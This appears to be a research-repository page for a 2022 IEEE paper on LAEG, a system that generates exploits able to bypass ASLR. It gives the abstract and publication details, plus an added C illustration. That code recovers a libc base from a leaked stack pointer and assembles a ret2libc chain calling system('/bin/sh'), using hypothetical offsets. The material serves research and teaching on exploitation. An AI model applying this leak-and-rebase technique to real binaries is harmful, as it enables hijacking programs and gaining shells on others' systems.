LAEG: Leak-based AEG using Dynamic Binary Analysis to Defeat ASLR

Wei Loon Mow, Shih Kun Huang, Hsu Chun Hsiao

Research output: Conference contribution (peer-reviewed)

6 citations (Scopus)

Abstract

Address space layout randomization (ASLR) is a binary protection technique that randomizes a binary's loaded base addresses in every execution. It hardens binaries against exploitation by preventing attackers from reusing resources identified in one run (e.g., code gadgets or stack buffers found at specific memory locations) in subsequent executions. As most modern compilers and operating systems enable ASLR by default, an effective automated exploit generation (AEG) system should be resilient to ASLR when constructing exploits. However, previously proposed AEG systems either assume the absence of ASLR or only bypass it under limited circumstances, and thus cannot reliably exploit binaries running on modern operating systems. With the aim of improving AEG's practicality by developing an ASLR-resilient AEG system, we designed and implemented leak-based AEG (LAEG), a system that can recover randomized base addresses by leaking additional information at runtime. Specifically, given a proof-of-crash input, LAEG uses dynamic taint analysis to analyze the black-box binary and identifies the input and output states relevant to the base address information. By doing so, LAEG can efficiently recover base addresses from uninitialized buffers and use them to construct an exploit that is resilient to ASLR. Moreover, our tests established that LAEG could successfully construct exploits that bypass state-of-the-art binary protections, including not only ASLR but also PIE, NX, and stack canaries. Besides that, LAEG exhibited better performance than an open-source AEG solution, Zeratool, and was between 6.46x and 45.15x faster at exploit generation than human experts were.
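
The leak-to-base step the abstract describes, as an added illustration that is not LAEG's own code and is not taken from the paper: a target echoes a stack buffer after a short read, so the tail of the output is stale (uninitialized) stack memory containing a libc return address. Taint analysis is what would identify the output offset that derives from that uninitialized slot; here the offset (LEAK_POS), the 32-byte output, the leaked pointer value, and every libc symbol offset are constructed, hypothetical values chosen for the example rather than offsets of any real libc build. The code extracts the pointer, recovers the page-aligned base, rejects implausible candidates, and rebases a ret2libc chain from that base.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* x86-64 user space: mmap'd image bases are page aligned and sit below the
 * 47-bit canonical boundary. Both checks cheaply reject output bytes that
 * merely look like a pointer but are unrelated data. */
#define PAGE_MASK      0xfffULL
#define USER_SPACE_END 0x800000000000ULL

/* Hypothetical static offsets inside the target's libc, of the kind one reads
 * off `nm -D` or `readelf -s` of the library shipped with the target. These
 * are illustrative values, not offsets of any real libc build. */
#define LEAKED_RET_OFFSET 0x29d90ULL  /* return address into __libc_start_call_main */
#define POP_RDI_OFFSET    0x2a3e5ULL  /* pop rdi ; ret */
#define RET_OFFSET        0x29139ULL  /* ret (keeps the stack 16-byte aligned) */
#define SYSTEM_OFFSET     0x50d70ULL  /* system */
#define BINSH_OFFSET      0x1d8678ULL /* "/bin/sh" in libc's .rodata */

/* Constructed 32-byte program output. Assume the target did read(0, buf, 32)
 * then write(1, buf, 32); we sent only "alice", so bytes beyond our input are
 * stale stack contents. The taint pass is assumed to have reported that bytes
 * [16,24) derive from an uninitialized pointer-sized slot, which here holds
 * the invented value 0x7f3a1c30ed90 (little-endian). */
#define LEAK_POS 16
static const unsigned char sample_output[32] = {
    'a', 'l', 'i', 'c', 'e', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0x90, 0xed, 0x30, 0x1c, 0x3a, 0x7f, 0x00, 0x00,
    0x01, 0, 0, 0, 0, 0, 0, 0,
};

/* Read a little-endian 64-bit value out of raw output; 0 if out of range. */
uint64_t read_le64(const unsigned char *buf, size_t len, size_t pos) {
    if (pos > len || len - pos < 8) return 0;
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | buf[pos + i];
    return v;
}

/* Turn a leaked pointer into the base of the image it belongs to, or 0 if the
 * candidate fails the alignment / address-range sanity checks. */
uint64_t recover_base(uint64_t leaked, uint64_t sym_offset) {
    if (leaked < sym_offset) return 0;
    uint64_t base = leaked - sym_offset;
    if (base & PAGE_MASK) return 0;
    if (base == 0 || base >= USER_SPACE_END) return 0;
    return base;
}

/* End to end: pull the pointer from the taint-identified output position and
 * rebase it. */
uint64_t recover_base_from_output(const unsigned char *out, size_t len,
                                  size_t pos, uint64_t sym_offset) {
    return recover_base(read_le64(out, len, pos), sym_offset);
}

/* Build a ret2libc chain (pop rdi; "/bin/sh"; ret; system) from the recovered
 * base. Every word depends on this execution's leak, which is why the chain
 * has to be assembled online rather than hardcoded. Returns the number of
 * words written, or 0 if the caller's buffer is too small. */
size_t build_ret2libc_chain(uint64_t base, uint64_t *chain, size_t cap) {
    if (cap < 4) return 0;
    chain[0] = base + POP_RDI_OFFSET;
    chain[1] = base + BINSH_OFFSET;
    chain[2] = base + RET_OFFSET;
    chain[3] = base + SYSTEM_OFFSET;
    return 4;
}

int main(void) {
    uint64_t base = recover_base_from_output(sample_output, sizeof sample_output,
                                             LEAK_POS, LEAKED_RET_OFFSET);
    if (!base) {
        puts("no plausible base in leak");
        return 1;
    }
    uint64_t chain[4];
    size_t n = build_ret2libc_chain(base, chain, 4);
    printf("libc base 0x%llx\n", (unsigned long long)base);
    for (size_t i = 0; i < n; i++)
        printf("chain[%zu] = 0x%llx\n", i, (unsigned long long)chain[i]);
    return 0;
}
```

The recovered base is valid only for the process that produced the leak, so a leak-based exploit must send the crafted payload in the same session it read the output from; a chain computed against an earlier run is what ASLR defeats. The alignment and address-range checks matter in practice because a short read can leave arbitrary stale bytes in the buffer, and a candidate that fails them should be discarded rather than used to build a chain.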

Original language: English
Title of host publication: 5th IEEE Conference on Dependable and Secure Computing, DSC 2022 and SECSOC 2022 Workshop, PASS4IoT 2022 Workshop SICSA International Paper/Poster Competition in Cybersecurity
Publisher: Institute of Electrical and Electronics Engineers Inc.
ISBN (electronic): 9781665421416
DOIs
Publication status: Published - 2022
Event: 5th IEEE Conference on Dependable and Secure Computing, DSC 2022 - Edinburgh, United Kingdom
Duration: 22 Jun 2022 to 24 Jun 2022

Publication series

Name: 5th IEEE Conference on Dependable and Secure Computing, DSC 2022 and SECSOC 2022 Workshop, PASS4IoT 2022 Workshop SICSA International Paper/Poster Competition in Cybersecurity

Conference

Conference: 5th IEEE Conference on Dependable and Secure Computing, DSC 2022
Country/Territory: United Kingdom
City: Edinburgh
Period: 22/06/22 to 24/06/22
